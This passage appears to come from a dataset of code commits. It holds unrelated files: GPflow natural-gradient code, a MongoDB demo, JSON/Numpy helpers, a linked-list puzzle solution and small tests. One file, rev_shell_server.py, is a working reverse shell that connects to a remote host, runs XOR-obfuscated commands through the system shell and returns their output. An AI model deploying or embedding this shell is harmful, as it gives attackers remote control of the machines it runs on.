        :param feed_dict: Feed dictionary of tensors passed to session run method.
        :param maxiter: Number of run interation.
        :param initialize: If `True` model parameters will be re-initialized even if they were
            initialized before for gotten session.
        :param anchor: If `True` trained variable values computed during optimization at
            particular session will be synchronized with internal parameter values.
        :param kwargs: This is a dictionary of extra parameters for session run method.
        """
        # NOTE(review): `Model` is not imported in this module -- the file
        # needs e.g. `from ..models import Model` for this check to work.
        if model is None or not isinstance(model, Model):
            raise ValueError('Unknown type passed for optimization.')

        session = model.enquire_session(session)
        self._model = model
        objective = model.objective
        with session.graph.as_default(), tf.name_scope(self.name):
            full_var_list = self._gen_var_list(model, var_list)
            # Create optimizer variables before initialization.
            self._minimize_operation = self.optimizer.minimize(
                objective, var_list=full_var_list, **kwargs)
            model.initialize(session=session, force=initialize)
            self._initialize_optimizer(session, full_var_list)
            feed_dict = self._gen_feed_dict(model, feed_dict)
            for _i in range(maxiter):
                session.run(self.minimize_operation, feed_dict=feed_dict)
        if anchor:
            model.anchor(session)
def _forward_gradients(ys, xs, d_xs):
    """
    Forward-mode pushforward analogous to the pullback defined by tf.gradients.

    With tf.gradients, grad_ys is the vector being pulled back, and here d_xs is
    the vector being pushed forward, i.e. this computes (d ys / d xs) d_xs via
    the double-gradients trick: a first tf.gradients with placeholder
    cotangents v builds (d ys / d xs)^T v, and differentiating that result
    w.r.t. v with grad_ys=d_xs yields the Jacobian-vector product.

    :param ys: list of tensors being differentiated
    :param xs: list of tensors to differentiate with respect to
    :param d_xs: list of tangent vectors to push forward (same shapes as xs,
        not ys -- they are the grad_ys of the second tf.gradients call)
    :return: list of Jacobian-vector products (d ys / d xs) · d_xs, one per
        element of ys (same shapes as ys)
    """
    v = [tf.placeholder(y.dtype) for y in ys]
    g = tf.gradients(ys, xs, grad_ys=v)
    return tf.gradients(g, v, grad_ys=d_xs)
def _build_natgrad_step_op(objective, q_mu_param, q_sqrt_param, xi_transform=None, gamma=1.0):
    """Build the assign ops for one natural-gradient step on (q_mu, q_sqrt).

    :param objective: scalar loss tensor to differentiate.
    :param q_mu_param: GPflow Parameter for the variational mean.
    :param q_sqrt_param: GPflow Parameter for the variational sqrt-covariance.
    :param xi_transform: parameterization used for the update; defaults to XiNat().
    :param gamma: step size (new keyword; default 1.0 keeps the signature
        backward compatible -- the old body referenced the undefined name
        ``self.gamma`` inside this module-level function).
    :return: (q_mu_assign, q_sqrt_assign) tuple of tf.assign ops.

    BUG FIXES vs. the original: stray closing parens on the two tf.assign
    lines (syntax errors); ``xi_transforms`` was assigned but the unchecked
    ``xi_transform`` used afterwards (crash when None); the helper is named
    ``_forward_gradients``, not ``forward_gradients``.
    """
    if xi_transform is None:
        xi_transform = XiNat()

    q_mu_u, q_sqrt_u = q_mu_param.unconstrained_tensor, q_sqrt_param.unconstrained_tensor
    q_mu, q_sqrt = q_mu_param.constrained_tensor, q_sqrt_param.constrained_tensor

    etas = meanvarsqrt_to_expectation(q_mu, q_sqrt)
    nats = meanvarsqrt_to_natural(q_mu, q_sqrt)

    dL_d_mean, dL_d_varsqrt = tf.gradients(objective, [q_mu, q_sqrt])

    # Chain the loss gradients back through the expectation parameters.
    _nats = expectation_to_meanvarsqrt(*etas)
    dL_detas = tf.gradients(_nats, etas, grad_ys=[dL_d_mean, dL_d_varsqrt])

    # Push the natural gradient forward into xi coordinates.
    _xis = xi_transform.naturals_to_xi(*nats)
    nat_dL_xis = _forward_gradients(_xis, nats, dL_detas)

    xis = xi_transform.meanvarsqrt_to_xi(q_mu, q_sqrt)
    xis_new = [xis[i] - gamma * nat_dL_xis[i] for i in range(2)]

    # NOTE(review): the sibling xi_* transforms are called with unpacked
    # arguments elsewhere; the original passed the list itself -- confirm.
    mean_new, varsqrt_new = xi_transform.xi_to_meanvarsqrt(*xis_new)
    mean_new.set_shape(q_mu_param.shape)
    varsqrt_new.set_shape(q_sqrt_param.shape)

    q_mu_assign = tf.assign(q_mu_u, q_mu_param.transform.backward_tensor(mean_new))
    q_sqrt_assign = tf.assign(q_sqrt_u, q_sqrt_param.transform.backward_tensor(varsqrt_new))
    return q_mu_assign, q_sqrt_assign
def _build_natgrad_step_ops(objective, params_and_transforms):
    """Group one natural-gradient step for every variational parameter pair.

    :param objective: scalar loss tensor.
    :param params_and_transforms: iterable of (q_mu, q_sqrt, xi_transform)
        triples.
    :return: a single tf.group op running all the assign ops.

    BUG FIX: the original list comprehension
    ``[_build_natgrad_step_op() in q_mu, ...]`` was malformed (a membership
    test, not a call with loop variables), and ``tf.group(ops)`` passed the
    list as one argument instead of unpacking the individual ops.
    """
    ops = [_build_natgrad_step_op(objective, q_mu, q_sqrt, xi_transform)
           for q_mu, q_sqrt, xi_transform in params_and_transforms]
    # Each step op is an (assign, assign) tuple; flatten before grouping.
    flat_ops = list(sum(ops, ()))
    return tf.group(*flat_ops)
| apache-2.0 | Python | |
36e730ea3d984b8da8081397d4ac0c4dd3bb82f2 | add mongoDB cache demo. | yanbober/SmallReptileTraining | PersistenceSpider/demo_mongodb_persistence.py | PersistenceSpider/demo_mongodb_persistence.py | import pymongo
'''
Python3 MongoDB数据库持久化演示
'''
class MongoDBPersistence(object):
    """Minimal MongoDB persistence helper over a hard-coded localhost server
    and a fixed 'DemoTable' collection."""

    def __init__(self):
        # Both stay None until connect() succeeds; every other method
        # checks them before touching the server.
        self.conn = None
        self.database = None

    def connect(self, database):
        """Connect to mongodb://localhost:27017/ and select `database`.

        Failures are reported on stdout and leave self.conn/self.database
        as None (best-effort, matching the original behaviour).
        """
        try:
            self.conn = pymongo.MongoClient('mongodb://localhost:27017/')
            self.database = self.conn[database]
        except Exception as e:
            print("MongoDB connect failed." + str(e))

    def close(self):
        """Close the client connection if one was opened (best-effort)."""
        try:
            if self.conn is not None:
                self.conn.close()
        except BaseException as e:
            print("MongoDB close failed."+str(e))

    def insert_table_dict(self, dict_data=None):
        """Save `dict_data` into the DemoTable collection.

        :return: True on success, False when not connected, when dict_data
            is None, or when the save raises.

        BUG FIX: the original returned True even after catching an insert
        error; the failure path now returns False.
        NOTE(review): Collection.save() is deprecated in pymongo 3 and
        removed in pymongo 4 -- migrate to insert_one/replace_one when the
        driver is upgraded.
        """
        if self.conn is None or self.database is None:
            print('Please ensure you have connected to MongoDB server!')
            return False
        if dict_data is None:
            return False
        try:
            collection = self.database['DemoTable']
            collection.save(dict_data)
        except BaseException as e:
            print("MongoDB insert error." + str(e))
            return False
        return True

    def get_dict_by_name(self, name=None):
        """Return DemoTable documents as a list; all of them when name is
        None, otherwise those whose 'name' field matches."""
        if self.conn is None or self.database is None:
            print('Please ensure you have connected to MongoDB server!')
            return None
        collection = self.database['DemoTable']
        if name is None:
            documents = collection.find()
        else:
            documents = collection.find({"name": name})
        document_list = list()
        for document in documents:
            document_list.append(document)
        return document_list
if __name__ == '__main__':
    # Demo: insert four documents, then query one by name and then all.
    t_mysql = MongoDBPersistence()
    t_mysql.connect("DemoDatabase")
    t_mysql.insert_table_dict({'name': 'Test1', 'content': 'XXXXXXXXXXXXX'})
    t_mysql.insert_table_dict({'name': 'Test2', 'content': 'vvvvvvvvvvvv'})
    t_mysql.insert_table_dict({'name': 'Test3', 'content': 'qqqqqqqqqqqq'})
    t_mysql.insert_table_dict({'name': 'Test4', 'content': 'wwwwwwwwwwwww'})
    print('MongoDBPersistence get Test2: ' + str(t_mysql.get_dict_by_name('Test2')))
    print('MongoDBPersistence get All: ' + str(t_mysql.get_dict_by_name()))
t_mysql.close() | mit | Python | |
930630e886d8666844639e7cf9d273bd8e4c2115 | Create rev_shell_server.py | panagiks/reverse_shell,panagiks/RSPET | Server/rev_shell_server.py | Server/rev_shell_server.py | #!/usr/bin/python
import socket
import subprocess
import sys
def main():
    """Connect back to RHOST:9000 and serve an XOR-obfuscated remote shell.

    Protocol: every byte on the wire is XORed with 0x41; the decoded
    command 'killMe' terminates the session.  (Python 2 script: relies on
    bytearray == str comparison and str() of a bytearray.)
    """
    try:
        RHOST = sys.argv[1]
        RPORT = 9000
    except IndexError:  # no host argument on the command line
        print ("Must provide host")
        sys.exit()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((RHOST, RPORT))
    while True:
        # Receive XOR-encoded data.
        data = s.recv(1024)
        # XOR each byte with 0x41 again to recover the plaintext command.
        en_data = bytearray(data)
        for i in range(len(en_data)):
            en_data[i] ^= 0x41
        if en_data == 'killMe':
            break
        # Execute the decoded command.  shell=True is intentional here:
        # this tool's purpose is to hand the peer a shell.
        comm = subprocess.Popen(str(en_data), shell=True,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        STDOUT, STDERR = comm.communicate()
        # XOR-encode the output before sending it back.
        if STDOUT:
            en_STDOUT = bytearray(STDOUT)
        else:
            en_STDOUT = bytearray("Command not recognised")
        for i in range(len(en_STDOUT)):
            en_STDOUT[i] ^= 0x41
        try:
            s.send(en_STDOUT)
        except socket.error:  # peer went away; nothing left to do
            sys.exit()
    s.close()
# Script entry point.
if __name__ == "__main__":
    main()
| mit | Python | |
921e4fe305e7d39347635c99fd4f9cc84ed7e534 | Add ImageTextAnnotation migration | comic/comic-django,comic/comic-django,comic/comic-django,comic/comic-django,comic/comic-django | app/grandchallenge/annotations/migrations/0005_imagetextannotation.py | app/grandchallenge/annotations/migrations/0005_imagetextannotation.py | # Generated by Django 2.2.2 on 2019-07-11 10:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
    """Auto-generated migration: creates the ImageTextAnnotation model.

    The model is a free-text annotation with a UUID primary key and
    created/modified timestamps, linked to a cases.Image and to the
    grader (user) who wrote it.  Auto-generated by Django — do not edit
    by hand.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("cases", "0011_auto_20190314_1453"),
        (
            "annotations",
            "0004_imagepathologyannotation_imagequalityannotation_retinaimagepathologyannotation",
        ),
    ]

    operations = [
        migrations.CreateModel(
            name="ImageTextAnnotation",
            fields=[
                (
                    "id",
                    models.UUIDField(
                        default=uuid.uuid4,
                        editable=False,
                        primary_key=True,
                        serialize=False,
                    ),
                ),
                ("modified", models.DateTimeField(auto_now=True)),
                (
                    "created",
                    models.DateTimeField(default=django.utils.timezone.now),
                ),
                ("text", models.TextField()),
                (
                    "grader",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
                (
                    "image",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="cases.Image",
                    ),
                ),
            ],
            options={
                # Newest annotations first; latest() uses "created".
                "ordering": ["-created"],
                "get_latest_by": "created",
                "abstract": False,
            },
        )
    ]
| apache-2.0 | Python | |
9a567d283cc2e72e3590305f81b3879d7f2557fa | include json_io.py from another older project. | Who8MyLunch/HackingForMovieTrends | json_io.py | json_io.py |
from __future__ import division, print_function, unicode_literals
import numpy as np
import simplejson as json
#
# Helpers.
#

# Tag embedded in a dict key to mark a serialized Numpy array.
MARKER = ':ndar!'


class NumpyJSONEncoder(json.JSONEncoder):
    """JSON encoder that knows how to serialize Numpy arrays.

    An ndarray is emitted as a single-item dict whose key carries the
    marker plus the dtype name, and whose value is the nested-list form
    of the array.  Everything else falls back to the base encoder.
    """

    def default(self, obj):
        if not isinstance(obj, np.ndarray):
            # Not an array: defer to the standard behavior
            # (raises TypeError for unsupported types).
            return json.JSONEncoder.default(self, obj)
        tagged_key = '%s.%s' % (MARKER, obj.dtype.name)
        return {tagged_key: obj.tolist()}
def numpy_hook(decoded_obj):
    """json object_hook that rebuilds Numpy arrays made by NumpyJSONEncoder.

    A dict qualifies when it has exactly one item and its key contains
    MARKER; the dtype name is recovered from the key.  Anything else is
    returned unchanged.
    """
    if isinstance(decoded_obj, dict):
        if len(decoded_obj) == 1:
            # next(iter(...)) works on both Python 2 and 3; the original
            # dict.items()[0] breaks on Python 3, where items() is a
            # non-subscriptable view.
            key, val = next(iter(decoded_obj.items()))
            if MARKER in key:
                dtype_name = key[len(MARKER) + 1:]  # skip "<MARKER>."
                decoded_obj = np.asarray(val, dtype=dtype_name)
    # Done.
    return decoded_obj
#################################################
def read(fname):
    """Read serialized data from JSON file, decode into Python object(s).

    Numpy arrays written by `write` are reconstructed via `numpy_hook`.

    Parameters
    ----------
    fname : string file name.
    """
    # Slurp the whole file, then decode in one pass.
    with open(fname, 'r') as fi:
        serial = fi.read()
    return json.JSONDecoder(object_hook=numpy_hook).decode(serial)
def write(fname, data):
    """Encode Python object(s), write to JSON file.

    Parameters
    ----------
    fname : string file name.
    data : Data to be written to file. May include Numpy arrays.
    """
    # Serialize first so encoding errors surface before the file is touched.
    serial = NumpyJSONEncoder(check_circular=True, indent=' ').encode(data)
    with open(fname, 'w') as fo:
        fo.write(serial)
| mit | Python | |
55cc66bc6d1c2c6280bb959bea23e14b4f26c741 | Add Two Numbers problem | zsmountain/leetcode,zsmountain/leetcode,zsmountain/leetcode | add_two_numbers.py | add_two_numbers.py | '''
You are given two linked lists representing two non-negative numbers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.
Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)
Output: 7 -> 0 -> 8
'''
'''
The main idea is quite simple, but need to pay attention to edge cases, e.g. there is still carry after adding is done (1 + 99)
'''
# Definition for singly-linked list.
class ListNode:
    def __init__(self, x):
        self.val = x      # digit stored in this node (least-significant first)
        self.next = None  # next (more significant) digit, or None


class Solution:
    # @return a ListNode
    def addTwoNumbers(self, l1, l2):
        """Add two non-negative numbers stored as reversed digit lists.

        Each node holds one digit, least-significant digit first; the sum
        is returned in the same representation.  Runs in O(max(m, n)).

        The original version used three near-identical loops (common
        prefix, l1 tail, l2 tail) plus a final-carry special case; one
        loop that treats a missing node as 0 covers all of them,
        including carry-out cases like 1 + 99 -> 100.
        """
        dummy = ListNode(0)  # placeholder so the head needs no special case
        tail = dummy
        carry = 0
        while l1 or l2 or carry:
            total = carry
            if l1:
                total += l1.val
                l1 = l1.next
            if l2:
                total += l2.val
                l2 = l2.next
            carry, digit = divmod(total, 10)
            tail.next = ListNode(digit)
            tail = tail.next
        return dummy.next
if __name__ == '__main__':
    # Ad-hoc smoke test: builds linked lists by hand and prints each sum.
    # NOTE: Python 2 print statements, matching the rest of this file.
    s = Solution()
    # First operand: 2 -> 4 -> 3 -> 5 (four digits — one more than the
    # 2 -> 4 -> 3 example in the module docstring).
    p1 = ListNode(2)
    p2 = ListNode(4)
    p3 = ListNode(3)
    p4 = ListNode(5)
    p1.next = p2
    p2.next = p3
    p3.next = p4
    l1 = p1
    # Second operand: 5 -> 6 -> 4.
    n1 = ListNode(5)
    n2 = ListNode(6)
    n3 = ListNode(4)
    n1.next = n2
    n2.next = n3
    l2 = n1
    l = s.addTwoNumbers(l1, l2)
    while l:
        print l.val, ' -> ',
        l = l.next
    print "\n"
    # 5 + 5 = 10: exercises a carry out of the last digit.
    l1 = ListNode(5)
    l2 = ListNode(5)
    l = s.addTwoNumbers(l1, l2)
    while l:
        print l.val, ' -> ',
        l = l.next
    print "\n"
    # 1 + 99 = 100: carry propagates past the end of the longer list.
    l1 = ListNode(1)
    n1 = ListNode(9)
    n2 = ListNode(9)
    n1.next = n2
    l2 = n1
    l = s.addTwoNumbers(l1, l2)
    while l:
        print l.val, ' -> ',
        l = l.next
    print "\n"
| apache-2.0 | Python | |
a3f23b804265bd59473873c2aa071188a73a9a9e | Test fail cases for custom codegen | cpcloud/slumba,cpcloud/slumba | slumba/tests/test_numbaext.py | slumba/tests/test_numbaext.py | import pytest
from numba import boolean, njit, int64, TypingError
from slumba.numbaext import not_null, sizeof, unsafe_cast
def test_sizeof_invalid():
    """sizeof() applied to a plain int64 must fail at typing time."""
    with pytest.raises(TypingError):
        # Eager compilation (explicit signature) triggers typing here.
        @njit(int64(int64))
        def bad_sizeof(x):
            return sizeof(x)
def test_not_null_invalid():
    """not_null() applied to a plain int64 must fail at typing time."""
    with pytest.raises(TypingError):
        # Eager compilation (explicit signature) triggers typing here.
        @njit(boolean(int64))
        def bad_not_null(x):
            return not_null(x)
def test_unsafe_case_invalid():
    """unsafe_cast() with an invalid source type must fail at typing time."""
    with pytest.raises(TypingError):
        # Eager compilation (explicit signature) triggers typing here.
        @njit(int64(int64))
        def bad_unsafe_cast(x):
            return unsafe_cast(x, int64)
| apache-2.0 | Python | |
a1ae01bada1d500bd7f9f7f0f2deb458bfa6d2d1 | Add the serial python test | Pitchless/arceye,Pitchless/arceye | bin/serial_test.py | bin/serial_test.py | #!/usr/bin/env python
from serial import Serial
from time import sleep
ser = Serial('/dev/ttyUSB0', 9600)
sleep(3) # wait for the board to reset
print "start"
print "write"
ser.write("hello\n")
print "read"
line = ser.readline()
print "GOT %s"%line
print "write world..."
ser.write("world\n")
print "read"
line = ser.readline()
print "GOT %s"%line
line = ser.readline()
print "GOT %s"%line
cmd = ""
while not cmd == "q":
cmd = raw_input(">> ")
ser.write(cmd+"\n")
out = ser.readline()
out = ser.readline()
print out
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.